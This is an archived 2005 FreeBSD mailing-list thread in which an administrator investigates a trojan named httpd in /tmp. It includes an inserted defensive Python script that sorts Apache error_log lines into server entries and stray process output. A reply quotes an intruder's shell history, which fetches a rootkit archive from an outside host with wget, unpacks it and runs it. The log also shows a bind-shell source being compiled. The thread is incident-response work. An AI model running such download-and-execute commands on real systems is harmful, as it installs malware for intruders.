Date:      Wed, 9 Feb 2005 11:41:26 -0600
From:      "Bret Walker" <bret-walker@northwestern.edu>
To:        "'Oliver Leitner'" <Shadow333@gmx.at>, <freebsd-questions@freebsd.org>
Subject:   RE: httpd in /tmp - Sound advice sought
Message-ID:  <042101c50ece$944bbad0$17336981@medill.northwestern.edu>
In-Reply-To: <20050209145353.304EC43D49@mx1.FreeBSD.org>

Thanks for letting me know.

I found this in my httpd error log:

[Fri Jan 14 13:06:06 2005] [error] [client 129.xxx.xxx.xxx] File does not
exist: /usr/local/www/data/favicon.ico
wget: permission denied
./httpd: not found
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from
pointer without a cast
[Fri Jan 14 21:40:12 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Fri Jan 14 21:40:21 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sat Jan 15 21:36:33 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 21:54:06 2005] [error] [client 195.92.95.15] File does not
exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 23:58:22 2005] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer
(errno: 54)

I also found shellbind.c in my /tmp directory.  Is there a way to tell
what type of exploit was used to get these files on my system (i.e. OpenSSL
/ PHP register_globals)?

I've been monitoring this server from a port that mirrors its traffic
using Ethereal, and all seems to be okay now.  I also cvsuped -Rr my
apache+mod_ssl install.

Thanks,
Bret
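As an added illustration (not part of Bret's or Oliver's mail), the log excerpt above shows compiler and shell output interleaved with ordinary Apache error_log entries. Apache only ever writes lines of the form `[date] [level] ...` to that file; anything else was written to the server's stderr by a process spawned from the httpd context (a CGI or PHP child), so the stray lines both confirm that commands were run and bound the time window between the surrounding dated entries. The `./httpd: permission denied` lines are also consistent with the rw,noexec mount of /tmp that Bret describes. The script below classifies error_log lines into Apache events and stray process output, tags the stray lines with the kind of tooling they indicate, and records the last Apache timestamp seen before each one. The sample log is constructed (the client address is a placeholder) to resemble the excerpt; the indicator patterns are my own assumptions, not an Apache feature.

```python
import re

# Constructed sample: a fragment of an Apache 1.3 error_log in which compiler
# and shell output from a process spawned by the web server is interleaved
# with ordinary "[date] [level] [client] ..." entries.
SAMPLE_LOG = """\
[Fri Jan 14 13:06:06 2005] [error] [client 129.0.0.1] File does not exist: /usr/local/www/data/favicon.ico
wget: permission denied
./httpd: not found
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
./httpd: permission denied
[Fri Jan 14 21:40:12 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer (errno: 54)
"""

# A genuine Apache 1.3 error_log entry: "[Fri Jan 14 13:06:06 2005] [error] message".
APACHE_LINE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\] "
    r"\[(?P<level>\w+)\] (?P<msg>.*)$"
)

# Assumed indicator patterns for stray output: a C compiler being driven from
# the server's process context, a downloader being invoked, or an attempt to
# run a file that failed (e.g. because of a noexec mount).
STRAY_INDICATORS = {
    "compiler_output": re.compile(r"^\S+\.c(:\d+)?: (In function|warning|error)"),
    "download_tool": re.compile(r"^(wget|curl|fetch|ftp): "),
    "exec_attempt": re.compile(r"^\./\S+: (not found|permission denied)", re.IGNORECASE),
}


def classify_error_log(text):
    """Split error_log text into (events, stray).

    events: parsed Apache entries (line number, timestamp, level, message).
    stray:  lines Apache itself could not have written, each tagged with the
            indicator names that matched and the timestamp of the last real
            Apache entry seen before it (None if there was none yet).
    """
    events = []
    stray = []
    last_ts = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = APACHE_LINE.match(line)
        if m:
            last_ts = m.group("ts")
            events.append({"line": lineno, "ts": last_ts,
                           "level": m.group("level"), "msg": m.group("msg")})
            continue
        tags = [name for name, pat in STRAY_INDICATORS.items() if pat.search(line)]
        stray.append({"line": lineno, "after_ts": last_ts, "text": line, "tags": tags})
    return events, stray


def summarize(stray):
    """Count stray lines per indicator; lines matching nothing count as 'untagged'."""
    counts = {}
    for entry in stray:
        for tag in entry["tags"] or ["untagged"]:
            counts[tag] = counts.get(tag, 0) + 1
    return counts


if __name__ == "__main__":
    events, stray = classify_error_log(SAMPLE_LOG)
    print(f"{len(events)} Apache entries, {len(stray)} stray lines")
    for entry in stray:
        print(f"line {entry['line']:>3} (after {entry['after_ts']}): "
              f"{','.join(entry['tags']) or 'untagged'}: {entry['text']}")
    print(summarize(stray))
```

Run against a real error_log, the `after_ts` value of the first stray line and the timestamp of the next Apache entry give the window to search in access_log for the request that spawned the process; Apache's own entries carry a client address, the stray lines do not, so that correlation is the only way the log itself points back to a request.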

-----Original Message-----
From: owner-freebsd-questions@freebsd.org
[mailto:owner-freebsd-questions@freebsd.org] On Behalf Of Oliver Leitner
Sent: Wednesday, February 09, 2005 8:48 AM
To: Bret Walker; freebsd-questions@freebsd.org
Subject: Re: httpd in /tmp - Sound advice sought


I know a certain hacking group who is trying to run their trojan as httpd. I
discovered that info through some shell account I am running, that has tried
to start this rootkit on our machine.

Here's a short view from the shell's history:

---------------------
wget geocities.com/setan_maya/taek.tar.gz
cd ..
ls
cd ..
ls
cd tmp
ls
wget geocities.com/setan_maya/taek.tar.gz
tar zxvf taek.tar.gz
ls
cd taek
./httpd
chmod 755 httpd
./httpd
ls
cd ..
rm -rf taek
rm taek.tar.gz
-----------------------

This clearly shows that we are dealing with a very dumb person, since he

1. didn't clean his history file
2. left the tar.gz file in his home dir
3. loaded the rootkit from the same server he is running the group's webpage
on.
4. has a link to their chan on that page, and in the chan, as I've monitored
for 48 hrs, I've found them posting their "successes" directly and
unencrypted.

I have informed a number of providers and hosters that had their webpage
posted into that chan, and informed them about the break-ins; so far I got no
message back from them.

Of course, it's a long shot, but they didn't seem to check first if the folder
tmp has the executable bit set at all, and they named their client like the
file you've found.

I hope this helps you further.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

On Tuesday 08 February 2005 14:35, Bret Walker wrote:
> Last night, I ran chkrootkit and it gave me a warning about being
> infected with Slapper.  Slapper exploits vulnerabilities in OpenSSL up
> to version 0.96d or older on Linux systems.  I have only run 0.97d.
> The file that set chkrootkit off was httpd which was located in /tmp.
> /tmp is always mounted rw, noexec.
>
> I update my packages (which are installed via ports) any time there is
> a security update.  I'm running Apache 1.3.33/PHP 4.3.10/mod_ssl
> 2.8.22/OpenSSL 0.97d on 4.10.  Register_globals was on in PHP for a
> couple of weeks, but the only code that required it to be on was in a
> .htaccess/SSL password protected directory.
>
> Tripwire didn't show anything that I noted as odd.  I reexamined the
> tripwire logs, which are e-mailed to an account off of the machine
> immediately after completion, and I don't
> see anything odd for the 3/4 days before or after the date on the file.
> (I don't scan /tmp)
>
> I stupidly deleted the httpd file from /tmp, which was smaller than
> the actual apache httpd.  And I don't back up /tmp.
>
> The only info I can find regarding this file being in /tmp pertains to
> Slapper.  Could something have copied a file there?  Could I have done
> it by mistake at some point - the server's been up ~60 days, plenty of
> time for me to forget something?
>
> This is a production box that I very much want to keep up, so I'm
> seeking some sound advice.
>
> Does this box need to be rebuilt?  How could a file get written to
> /tmp, and is it an issue since it couldn't be executed?  I run
> tripwire nightly, and haven't seen anything odd to the best of my
> recollection.  I also check ipfstat -t frequently to see if any odd
> connections are happening.
>
> I appreciate any sound advice on this matter.
>
> Thanks,
> Bret

--
By reading this mail you agree to the following:

using or giving out the email address and any
other info of the author of this email is strictly forbidden. By acting
against this agreement the author of this mail
will take possible legal actions against the abuse.


Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?042101c50ece$944bbad0$17336981>